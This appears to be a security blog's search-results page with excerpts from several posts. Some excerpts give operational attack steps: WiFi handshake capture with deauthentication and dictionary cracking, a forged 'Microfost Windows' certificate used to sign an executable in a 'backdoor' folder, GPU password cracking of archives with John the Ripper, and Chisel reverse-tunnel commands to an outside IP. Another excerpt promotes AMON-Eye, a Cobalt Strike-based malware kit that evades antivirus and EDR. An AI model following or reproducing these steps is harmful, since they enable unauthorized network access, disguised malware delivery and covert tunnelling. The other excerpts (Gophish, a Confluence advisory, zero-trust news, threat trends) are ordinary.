
Search Results


  • Use MacM1 Kali to crack wifi password (MacM1 Kali Crack WIFI)

    Pre-preparation: install Parallels and Kali on the Mac M1, and buy a Kali-compatible wireless adapter: https://www.alfa.com.tw/collections/kali-linux-compatible
    The relevant instructions are as follows:
    View the network card name: ip addr
    View the wlan0 usage mode: iwconfig
    Enable monitor mode: airmon-ng start wlan0
    Find the current wifi traffic information: airodump-ng wlan0mon
    Save the collected packets to "data" and keep running until the four-way handshake packet is captured: airodump-ng -w data -c 6 --bssid A2:1C:EA:95:6B:91 wlan0mon
    Disconnect the connected device: aireplay-ng --deauth 0 -a A2:1C:EA:95:6B:91 wlan0mon
    Use a dictionary file to brute-force the handshake: aircrack-ng data -w /usr/share/wordlists/rockyou.txt

  • Windows adds a digital signature to exe

    Generate a self-signed root certificate:
    makecert -n "CN=Microfost Windows" -r -sv Root.pvk Root.cer
    This command uses the makecert tool to create a self-signed root certificate with the subject name set to "Microfost Windows", saving the private key to Root.pvk and the public certificate to Root.cer.
    Convert the certificate to a Software Publisher Certificate (SPC):
    Cert2Spc.exe Root.cer Root.spc
    Use the Cert2Spc tool to convert the certificate just created into an SPC and save it to Root.spc.
    Combine the private key and the SPC into a PFX file:
    pvk2pfx.exe -pvk Root.pvk -pi timmy -spc Root.spc -pfx Root.pfx -f
    Use the pvk2pfx tool to combine the private key (Root.pvk) and the SPC (Root.spc) into a PFX file with the password "timmy", and save the result to Root.pfx.
    Add the certificate to the local computer's trusted root certificate store:
    CertMgr.Exe -add -c Root.cer -s -r localmachine root
    Use the CertMgr tool to add Root.cer to the local computer's Trusted Root Certification Authorities store.
    Sign an executable with the PFX file:
    signtool.exe sign /f Root.pfx /p timmy C:\Users\qoo7972365\Desktop\backdoor\windows_amd_excel.exe
    Use the signtool tool with the PFX file just created (password "timmy") to sign the specified executable.
    Tools download address

  • AMON-Eye: Advanced Malware Toolkit

    Overview
    In today's digital world, cyber threats have become increasingly serious, and malware attacks pose a huge threat to the data security of organizations and individuals. Cobalt Strike is a widely used red team tool, and its anti-virus and EDR bypass capabilities make it one of the most elusive tools available to adversaries. AMON-Eye is decompiled from, modified, and developed on the basis of Cobalt Strike; it combines different concepts and projects to further improve the attacker's stealth and operability. This article explores the usage and main functions of AMON-Eye.
    1. How to use AMON-Eye
    The use of AMON-Eye is relatively simple: the attacker only needs to run the AMON-Eye executable on the victim's system to start the attack. The tool suite provides a simple and intuitive user interface that lets the operator easily perform various attack activities.
    AMON-Eye's main features
    EDR and anti-virus bypass: AMON-Eye uses a range of techniques designed to bypass detection by EDR and anti-virus solutions. This includes encryption and compression to obfuscate malicious code, as well as anti-detection techniques to evade behavioral analysis and virus signatures.
    Attack modules: AMON-Eye has multiple built-in attack modules that perform various attack activities, such as implanting backdoors, executing remote code, and breaking system security restrictions. Attackers can select and configure these modules as needed to achieve their attack goals.
    Remote control and command: AMON-Eye has remote control and command capabilities, enabling attackers to monitor and operate infected systems from a remote location. This lets attackers flexibly control the course of attack activities while minimizing the risk of being detected and tracked.
    Detection evasion: AMON-Eye uses a variety of detection evasion techniques, such as module injection, code reorganization, and zombie processes, which make malicious code more difficult to detect and block when running on the system.
    Conclusion
    AMON-Eye is a powerful malware toolkit that is modified and developed on the basis of Cobalt Strike and combines the ideas of multiple technologies and projects. The toolkit is highly stealthy and operable, and attackers can use it to perform various advanced attack activities while bypassing the detection of EDR and anti-virus solutions. However, it should be emphasized that this article is for research and educational purposes only, and it is strictly prohibited to use AMON-Eye for any illegal activities; otherwise you will be held legally responsible.
    References
    AMON-Eye GitHub page: https://github.com/S3N4T0R-0X0/AMON-Eye

  • Gophish is the open source, free, enterprise phishing solution of choice

    In today's context of increasing cybersecurity awareness, fighting against phishing attacks has become increasingly important. Gophish is an open-source phishing simulation tool that helps companies and organizations conduct phishing attack tests and improve employees' cybersecurity awareness. This article introduces the Gophish software in detail, including installation methods, software instructions, advantages, and conclusions.
    1. Software Description
    Gophish has the following core functions:
    Email templates: used to create the email content and styles for a simulated phishing attack.
    Login page templates: used to create the login page for a simulated phishing attack.
    Mail server configuration: set up the mail server used to send the phishing emails.
    Recipient groups: group the test subjects for easier management and analysis.
    Run a simulated phishing attack: select the appropriate email template, login page template, mail server configuration, and recipient group to start a simulated phishing attack.
    Data analysis: Gophish collects data from the simulated attacks so that users can analyze it and improve cybersecurity awareness training.
    2. Advantages
    Open source and free: Gophish is open-source software, free for both commercial and individual users, reducing the cost of use for enterprises and organizations.
    Easy to use: Gophish has an intuitive interface that even beginners can quickly get started with, without needing complex network security expertise.
    High security: Gophish is only used to simulate phishing attacks and does not involve actual network intrusion behavior, providing a safe testing platform for enterprises and organizations.
    Data visualization: Gophish displays the data collected during the phishing test as charts, helping users intuitively understand the test results and security risks.
    High flexibility: Gophish supports custom email templates and login page templates, so users can tailor tests to their own needs and improve the targeting of the test.
    3. Conclusion
    As an open-source phishing simulation tool, Gophish has become an important choice for enterprises and organizations seeking to enhance their network security awareness, due to its ease of use, security, and flexibility. By using Gophish to run simulated phishing attack tests, enterprises and organizations can promptly discover potential security risks and take effective preventive measures to ensure network security.
    Practical application case teaching

  • Confluence CVE-2022-26134 Vulnerability Analysis

    Overview:
    Confluence is a knowledge management system commonly used by enterprises. It was recently found to have a security vulnerability, CVE-2022-26134. This vulnerability allows attackers to remotely compromise the affected system, resulting in data leakage or modification.
    Impact Analysis:
    The vulnerability affects Confluence Server and Data Center versions 7.4.0 to 7.11.6, 7.12.0 to 7.12.5, 7.13.0 to 7.13.6, 7.14.0 to 7.14.4, 7.15.0 to 7.15.3, and 7.16.0 to 7.16.2. Attackers exploit this vulnerability through improper input validation in an editor function. Once attackers successfully exploit the vulnerability, they can perform any action on the target system, including but not limited to stealing sensitive data, modifying data, and creating new accounts.
    Repair suggestions:
    Atlassian has confirmed the existence of this vulnerability and released a patch for the affected versions. Users of Confluence should upgrade to the latest version immediately to protect their systems from attack. In addition to upgrading, it is also recommended to take other measures to protect the system, such as limiting access to Confluence, using a firewall, and enabling multi-factor authentication. Most importantly, follow the latest security vulnerability news so that you can act in time to protect your data and systems.
    Related Videos: https://www.youtube.com/watch?v=wNt0JyfgS5Q

  • Chisel secure tunneling tool

    Introduction
    Chisel is an open source tool for creating secure tunnels over HTTP(S) connections. It uses a client-server architecture to establish a tunnel between two endpoints so that traffic can pass securely. Chisel is lightweight and easy to use.
    How it works
    Chisel works by creating a client-server connection over HTTP(S). The client is a small binary running on the local system, and the server is a web server that can be hosted anywhere. The client establishes a connection to the server over HTTP(S) and then sends a request to the server to create a tunnel. Once the tunnel is established, all traffic between the client and server is encrypted and sent through the tunnel. This means that even if an attacker intercepts the traffic, they will not be able to read it. The server acts as a proxy, forwarding traffic between the client and the target endpoint.
    Authentication
    Chisel supports multiple authentication methods to ensure that only authorized clients can establish a connection. By default, Chisel uses a shared key for client authentication. The client must provide the correct key when establishing a connection, otherwise the connection is rejected.
    HTTPS
    Chisel can also be configured to use SSL/TLS for additional security. When SSL/TLS is enabled, Chisel uses self-signed certificates by default. However, users can provide their own certificates for additional security.
    Server: chisel server -p 443 --reverse
    Client: chisel client 35.236.161.97:443 R:socks

  • John the Ripper Jumbo

    git clone https://github.com/openwall/john.git
    Install the packages required to build the code:
    sudo apt-get update
    sudo apt-get install libssl-dev
    sudo apt-get install build-essential
    sudo apt-get install libbz2-dev
    Enter src to start compiling and installing:
    cd john/src
    Compile with GPU (OpenCL) support enabled:
    ./configure --enable-opencl
    make -s clean && make -sj4
    Check how many GPUs and CPUs John can use:
    ./john --list=opencl-devices
    With 4 CPUs and 8 GB of RAM, it takes 103 hours to crack a five-character password of lowercase letters and digits.
    With 4 Tesla T4 GPUs, it takes only 10 hours to crack the same five-character password, which is 10 times faster (the 7z file in question is about 1 GB).
    Crack zip archive passwords:
    ~/john/run/john --format=zip-opencl --mask=[mycharset.chr] --min-length=1 --max-length=12 solomon_hash.txt --devices=2,3,4,5 --fork=4
    Crack 7z compressed files:
    perl 7z2john.pl ~/japan.7z > japan7zhash.txt
    If you encounter the following error, the Compress::Raw::Lzma module is missing:
    Can't locate Compress/Raw/Lzma.pm in @INC (you may need to install the Compress::Raw::Lzma module) (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.32.1 /usr/local/share/perl/5.32.1 /usr/lib/x86_64-linux-gnu/perl5/5.32 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.32 /usr/share/perl/5.32 /usr/local/lib/site_perl) at 7z2john.pl line 6.
    BEGIN failed -- compilation aborted at 7z2john.pl line 6.
    Run the following commands to install the missing package:
    sudo apt-get install liblzma-dev
    sudo cpan Compress::Raw::Lzma
    ~/john/run/john --format=7z-opencl --mask=[mycharset.chr] --min-length=1 --max-length=8 /home/qoo7972365/japan7zhash.txt --devices=1,2,3,4 --fork=4
    ./john/run/john --mask=timmy?l?l?l?l?l --min-length=10 --max-length=10 japan7zhash.txt

  • Five years to zero trust: Pentagon has ‘no choice’ but to sprint toward network goals

    “I can tell you at DoD, we’re taking this very seriously,” DoD CIO John Sherman said. “And we are committed to implementing zero trust at scale for our four-million-person-plus enterprise that we lead.”
    WASHINGTON — The Pentagon’s chief information officer is committed to implementing a zero trust architecture across the entire department in the next five years and will be releasing a new strategy to get there as soon as next month.
    “What we’re aiming for is by 2027 to have zero trust deployed across a majority of our enterprise systems in the Department of Defense,” DoD CIO John Sherman said at a FedTalks conference Wednesday. “Five years. That’s an ambitious goal… but the adversary capability we’re facing leaves us no choice but to move at that level of pace.”
    To get after its zero trust goals, the Pentagon plans to release a new strategy as soon as next month. The strategy will define DoD’s approach to zero trust from the “main controls” to the most sensitive systems. Sherman said that within the last month he also hired a new deputy chief information security officer to bolster the office’s efforts.
    “I can tell you at DoD, we’re taking this very seriously,” he said. “And we are committed to implementing zero trust at scale for our four-million-person-plus enterprise that we lead.”
    Source: Five years to zero trust: Pentagon has ‘no choice’ but to sprint toward network goals

  • A Perfect Storm: 7 Reasons Global Attacks Will Soar in 2023

    In 2023, the global annual cost of cyber crime is predicted to top $8 trillion, according to a recent Cybersecurity Ventures report. This seemingly enormous figure might still be a major underestimate. In 2021, U.S. financial institutions lost nearly $1.2 billion in costs due to ransomware attacks alone. That was a nearly 200% increase over the previous year. If we continue at that rate, next year could see global costs approaching $16 trillion. Why might costs be so high? Here are seven reasons why cyberattack rates and costs will rise dramatically in 2023.
    Reason 1: The Economy
    The Cybersecurity Ventures report correctly identified the talent crunch as a reason for concern. But the problem has even deeper roots. The worldwide economic outlook continues to face stiff headwinds. Inflation, the energy crisis and supply chain issues are affecting every industry. Inflation will increase the overall cost of cyber crime as preventive and remediation costs rise. While inflation is not directly related to the number of incidents, it does impact company budget decisions. In response, some of the biggest tech brands are reducing headcounts and implementing hiring freezes. Meanwhile, security teams have been stretched thin for years. If security budgets don’t rise with inflation, security leaders will have even less buying power to implement strong security and capable teams.
    Reason 2: Malware-as-a-Service
    Ransomware has plagued businesses, governments, individuals and organizations in nearly every sector. Now it’s easier than ever for threat actors to access powerful ransomware tools. Even with modest technical skills, criminals can launch attacks that can cost companies millions. Ransomware and other malware can be purchased for as little as $66. You can even get a phishing kit for free on underground forums. Meanwhile, the global average cost of a data breach is $4.35 million. And the majority of targets are already victims of repeat attacks (83% have had more than one breach, as per the IBM Cost of a Data Breach report). Since accessing malware services and kits has never been easier, attack rates are bound to rise substantially.
    Reason 3: Geopolitical Conflict
    In 2021, the Russia-based REvil Ransomware-as-a-Service group was responsible for nearly 18,000 attack attempts in the U.S. alone. Members of the group were also behind the Colonial Pipeline attack. The cyber gang claimed to rake in annual revenues of over $100 million. Some might forget it was the Russian government that eventually took down REvil. Reportedly, the takedown was part of a rare collaborative effort between the United States and Russia. Since the outbreak of the war in Ukraine, these kinds of collaborative efforts are less likely. The U.S. continues to increase cybersecurity collaborative efforts with friendly nations. But rising geopolitical tensions are already causing an increase in state-sponsored and politically driven attacks.
    Reason 4: Criminals Target Smaller Organizations
    While the big, high-profile breaches fill headlines, many intruders prefer to target smaller organizations. Between 2020 and 2021, cyberattacks on small companies surged by more than 150%, according to RiskRecon, a Mastercard company that evaluates companies’ security risk. The reasons behind this trend are twofold. For starters, smaller targets usually have weaker security. Also, high-profile targets like infrastructure or big corporations will likely attract a stronger law enforcement response. This means schools, local police departments, small government offices and businesses with fewer than 1,000 employees will continue to be attacked.
    Reason 5: Organizations Can’t Afford Cyber Insurance
    A recent report warns that the number of organizations with cyber insurance problems is set to double in 2023. They might be unable to afford cyber insurance, be declined coverage or experience significant coverage limitations. Forrester commented on the situation in its Top Cybersecurity Threats for 2022 report. The firm predicts that insurers will likely include new underwriting requirements and greater scrutiny of risk mitigation and security program maturity. The cyber insurance crisis is not only an indicator of rising risk. It will also place further financial pressure on businesses in the event of a breach.
    Reason 6: Rapidly Expanding Attack Surface
    In 2021 there were a total of 11.3 billion IoT devices worldwide. This number will likely reach 15.1 billion in 2023. Meanwhile, as of 2022, 26% of U.S. employees work remotely. Current estimates expect 36.2 million American employees to be working remotely by 2025. The first half of 2021 saw 1.5 billion attacks on smart devices, with attackers looking to steal sensitive data, cryptojack devices or build botnets. Intruders may even reach corporate assets from a device connected to a home network where remote work occurs. The attack surface has never been greater and continues to expand rapidly. This means threat actors have even more places to probe and attack.
    Reason 7: Hacktivism Rising
    The world continues to suffer from a wide variety of conflicts. In the geopolitical realm, pro-Ukraine or pro-Russian hackers launch attacks with political motives. We also see the rise of environmental hacktivists targeting mining and oil companies. According to one expert, hacktivism has become a mainstream force impacting millions of lives globally. “Hacking for a cause” incidents include the Democratic National Committee (DNC) email hack and the massive 2.6 TB Panama Papers leak. Hacktivism is a significant anti-establishment weapon promoting a diverse set of causes around the globe. And as street protests grow, online protests will grow as well.
    Get Ready for a Turbulent 2023
    These indicators all point towards a significant rise in cyberattacks and associated costs for 2023. Efforts to stem the tide are underway from both the public and private sectors. Let’s hope the good guys soon gain the upper hand.
    Source: https://securityintelligence.com/articles/7-reasons-global-attacks-will-soar-2023/
